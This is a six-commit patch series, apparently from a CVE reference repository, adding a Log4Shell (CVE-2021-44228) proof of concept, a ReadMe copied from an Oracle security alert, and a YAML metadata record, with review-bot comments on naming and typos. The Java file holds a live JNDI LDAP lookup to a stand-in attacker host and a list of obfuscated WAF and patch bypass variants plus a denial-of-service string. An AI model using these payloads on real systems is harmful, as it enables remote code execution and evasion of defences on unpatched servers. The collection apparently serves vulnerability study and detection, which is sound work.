From 8c93f1235d2cdc4e378b642dea94792fece8a8c3 Mon Sep 17 00:00:00 2001
From: Hua
Date: Tue, 14 Mar 2023 13:00:50 +0000
Subject: [PATCH 1/6] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-44228?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache/2021/CVE-2021-44228/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache/2021/CVE-2021-44228/.keep

diff --git a/cve/apache/2021/CVE-2021-44228/.keep b/cve/apache/2021/CVE-2021-44228/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee

From 53b33ebfe76c481c658ef168e561d59955441fae Mon Sep 17 00:00:00 2001
From: Hua
Date: Tue, 14 Mar 2023 13:12:51 +0000
Subject: [PATCH 2/6] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?=
 =?UTF-8?q?apache/2021/CVE-2021-44228/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache/2021/CVE-2021-44228/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache/2021/CVE-2021-44228/.keep

diff --git a/cve/apache/2021/CVE-2021-44228/.keep b/cve/apache/2021/CVE-2021-44228/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee

From 9789352de585c23e5075343ef04c11e625637f32 Mon Sep 17 00:00:00 2001
From: Hua
Date: Tue, 14 Mar 2023 13:14:16 +0000
Subject: [PATCH 3/6] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-44228?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/apache/2021/CVE-2021-44228/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache/2021/CVE-2021-44228/.keep

diff --git a/cve/apache/2021/CVE-2021-44228/.keep b/cve/apache/2021/CVE-2021-44228/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee

From d2a8ced2841ac1d23c118e57be8cbbbf7592fcc5 Mon Sep 17 00:00:00 2001
From: Hua
Date: Tue, 14 Mar 2023 13:15:43 +0000
Subject: [PATCH 4/6] rename cve/apache/2021/CVE-2021-44228/.keep to cve/apache/2021/CVE-2021-44228/log4j.java LOG4J Java exploit - WAF and patches bypass tricks
Signed-off-by: Hua
---
 cve/apache/2021/CVE-2021-44228/.keep | 0
 cve/apache/2021/CVE-2021-44228/log4j.java | 51 +++++++++++++++++++++++
 2 files changed, 51 insertions(+)
 delete mode 100644 cve/apache/2021/CVE-2021-44228/.keep
 create mode 100644 cve/apache/2021/CVE-2021-44228/log4j.java

diff --git a/cve/apache/2021/CVE-2021-44228/.keep b/cve/apache/2021/CVE-2021-44228/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/apache/2021/CVE-2021-44228/log4j.java b/cve/apache/2021/CVE-2021-44228/log4j.java
new file mode 100644
index 00000000..92c362c3
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-44228/log4j.java
@@ -0,0 +1,51 @@
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+public class log4j {
+ private static final Logger logger = LogManager.getLogger(log4j.class);
+
+ public static void main(String[] args) {
+
+ // To test entry you can use website:
+ // http://dnslog.cn/
+ // or
+ // http://canarytokens.org/generate (Choose Log4Shell token)
+
+ // Defaul one
+ logger.error("${jndi:ldap://somesitehackerofhell.com/z}");
+
+ // 1. System environment variables
+ // logger.error("${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}");
+
+ // 2. Lower Lookup
+ // logger.error("${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}");
+
+ // 2. Upper Lookup
+ // upper doesn't work for me - Tested on Windows 10
+ // logger.error("${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://somesitehackerofhell.com/z}");
+
+ // 3. "::-" notation
+ // logger.error("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}");
+
+ // 4. Invalid Unicode characters with upper
+ // logger.error("${jnd${upper:ı}:ldap://somesitehackerofhell.com/z}");
+
+ // 5. System properties
+ // logger.error("${jnd${sys:SYS_NAME:-i}:ldap://somesitehackerofhell.com/z}");
+
+ // 6. ":-" notation
+ // logger.error("${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}");
+
+ // 7. Date
+ // logger.error("${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://somesitehackerofhell.com/z}");
+
+ // 9. Non-existent lookup
+ // logger.error("${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://somesitehackerofhell.com/z}");
+
+ // 12. Trick with # (works on log4j 2.15)
+ // logger.error("${jndi:ldap://127.0.0.1#somesitehackerofhell.com/z}");
+
+ // 13. Dos attack (Works on LOG4j 2.8 - 2.16 )
+ // logger.error("${${::-${::-$${::-j}}}}");
+ }
+}
-- Gitee
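Review bot: The class on the `+public class log4j {` line is lower-case, which breaks Java's UpperCamelCase convention for types and makes the class read like the library it exercises; Java ties a public class to its file name, so the rename (e.g. `public class Log4jLookupTest {`) means renaming `log4j.java` in the same commit. The case list skips 8, 10 and 11, so a reader cannot tell whether entries were dropped from the upstream list or the numbering is simply off; renumber, or add `// entries 8, 10 and 11 intentionally omitted` if that is the case. The header comment names receiver services for confirming a callback but never says which Log4j versions the commented-out cases were checked against, while cases 12 and 13 carry their own version notes; a short file-level comment giving the version each case was observed on would let the file serve as a regression fixture for a patched deployment. `// Defaul one` is a typo for `// Default one`.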
From 204fda0e0c2668f4ef0943f741d6b88b2aa191cd Mon Sep 17 00:00:00 2001
From: Hua
Date: Tue, 14 Mar 2023 13:29:06 +0000
Subject: [PATCH 5/6] add cve/apache/2021/CVE-2021-44228/ReadMe.md. CVE-2021-44228 ReadMe
Signed-off-by: Hua
---
 cve/apache/2021/CVE-2021-44228/ReadMe.md | 40 ++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 cve/apache/2021/CVE-2021-44228/ReadMe.md

diff --git a/cve/apache/2021/CVE-2021-44228/ReadMe.md b/cve/apache/2021/CVE-2021-44228/ReadMe.md
new file mode 100644
index 00000000..58a94cf9
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-44228/ReadMe.md
@@ -0,0 +1,40 @@
+# CVE-2021-44228
+PoC for CVE-2021-44228
+
+
+### Description
+This Security Alert addresses CVE-2021-44228, a remote code execution vulnerability in Apache Log4j. It is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. It also addresses CVE-2021-45046, which arose as an incomplete fix by Apache to CVE-2021-44228.
+
+Due to the severity of this vulnerability and the publication of exploit code on various sites, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.
+
+### Security Alert Supported Products and Versions
+
+Patches released through the Security Alert program are provided only for product versions that are covered under the Premier Support or Extended Support phases of the Lifetime Support Policy. Oracle recommends that customers plan product upgrades to ensure that patches released through the Security Alert program are available for the versions they are currently running.
+
+Product releases that are not under Premier Support or Extended Support are not tested for the presence of vulnerabilities addressed by this Security Alert. However, it is likely that earlier versions of affected releases are also affected by these vulnerabilities. As a result, Oracle recommends that customers upgrade to supported versions.
+
+Database, Fusion Middleware, Oracle Enterprise Manager products are patched in accordance with the Software Error Correction Support Policy explained in My Oracle Support Note 209768.1. Please review the Technical Support Policies for further guidelines regarding support policies and phases of support.
+
+### Risk Matrix Content
+
+Risk matrices list only security vulnerabilities that are newly addressed by the patches associated with this advisory. Risk matrices for previous security patches can be found in previous Critical Patch Update advisories and Alerts. An English text version of the risk matrices provided in this document is here.
+
+Security vulnerabilities are scored using CVSS version 3.1 (see Oracle CVSS Scoring for an explanation of how Oracle applies CVSS version 3.1).
+
+Oracle conducts an analysis of each security vulnerability addressed by a Security Alert. Oracle does not disclose detailed information about this security analysis to customers, but the resulting Risk Matrix and associated documentation provide information about the type of vulnerability, the conditions required to exploit it, and the potential impact of a successful exploit. Oracle provides this information, in part, so that customers may conduct their own risk analysis based on the particulars of their product usage. For more information, see Oracle vulnerability disclosure policies.
+
+Oracle lists updates that address vulnerabilities in third-party components that are not exploitable in the context of their inclusion in their respective Oracle product beneath the product's risk matrix.
+
+The protocol in the risk matrix implies that all of its secure variants (if applicable) are affected as well. For example, if HTTP is listed as an affected protocol, it implies that HTTPS (if applicable) is also affected. The secure variant of a protocol is listed in the risk matrix only if it is the only variant affected, e.g. HTTPS will typically be listed for vulnerabilities in SSL and TLS.
+
+### Reference
+
+1. https://www.oracle.com/security-alerts
+2. https://www.oracle.com/security-alerts/cpufaq.html
+3. https://www.oracle.com/security-alerts/advisorymatrixglossary.html
+4. https://www.oracle.com/security-alerts/cvssscoringsystem.html
+5. https://www.oracle.com/security-alerts/cve-2021-44228verbose.html
+6. https://www.oracle.com/docs/tech/security-alerts/cve-2021-44228cvrf.xml
+7. https://www.oracle.com/security-alerts/public-vuln-to-advisory-mapping.html
+8. https://www.oracle.com/support/lifetime-support/resources.html
+9. https://support.oracle.com/rs?type=doc&id=2591118.1
\ No newline at end of file
-- Gitee

From 6f43c472c97735a3d374e286be51ff816d6b4015 Mon Sep 17 00:00:00 2001
From: Hua
Date: Tue, 14 Mar 2023 14:16:58 +0000
Subject: [PATCH 6/6] add cve/apache/2021/yaml/CVE-2021-44228.yaml update CVE-2021-44228
Signed-off-by: Hua
---
 cve/apache/2021/yaml/CVE-2021-44228.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 cve/apache/2021/yaml/CVE-2021-44228.yaml

diff --git a/cve/apache/2021/yaml/CVE-2021-44228.yaml b/cve/apache/2021/yaml/CVE-2021-44228.yaml
new file mode 100644
index 00000000..485fdc52
--- /dev/null
+++ b/cve/apache/2021/yaml/CVE-2021-44228.yaml
@@ -0,0 +1,23 @@
+id: CVE-202144228
+source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
+info:
+ name: Apache Log4j2
+ severity: critical
+ description:
+ This Security Alert addresses CVE-2021-44228, a remote code execution vulnerability in Apache Log4j. It is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. It also addresses CVE-2021-45046, which arose as an incomplete fix by Apache to CVE-2021-44228.
+ scope-of-influence:
+ Apache Log4j 2.x >=2.0-beta9 and < 2.15.0 (2.12.2 no effect)
+ reference:
+ - https://logging.apache.org/log4j/2.x/security.html
+ - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
+ - https://avd.aliyun.com/detail?id=AVD-2021-920285
+ - https://avd.aliyun.com/detail?id=AVD-2021-45046
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cve-id: CVE-2021-44228
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - Remote code execution vulnerabilities
\ No newline at end of file
-- Gitee
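Review bot: The first line of the YAML hunk, `+id: CVE-202144228`, drops the hyphen between year and number, so it disagrees with `cve-id: CVE-2021-44228` further down and with the file name `CVE-2021-44228.yaml`; anything that keys these records by `id` will fail to find this entry. Change it to `id: CVE-2021-44228`. `cnvd-id: None` and `kve-id: None` parse as the string `None` rather than a YAML null, which is fine for display but will not satisfy a null check; if absence is meant, `null` (or `~`) is the YAML spelling — presumably, depending on what consumes these files. The `description:` text is quoted from the Oracle alert while `source:` points at a third-party PoC collection; a one-line note that the description is taken from the vendor advisory would make its provenance clear to readers.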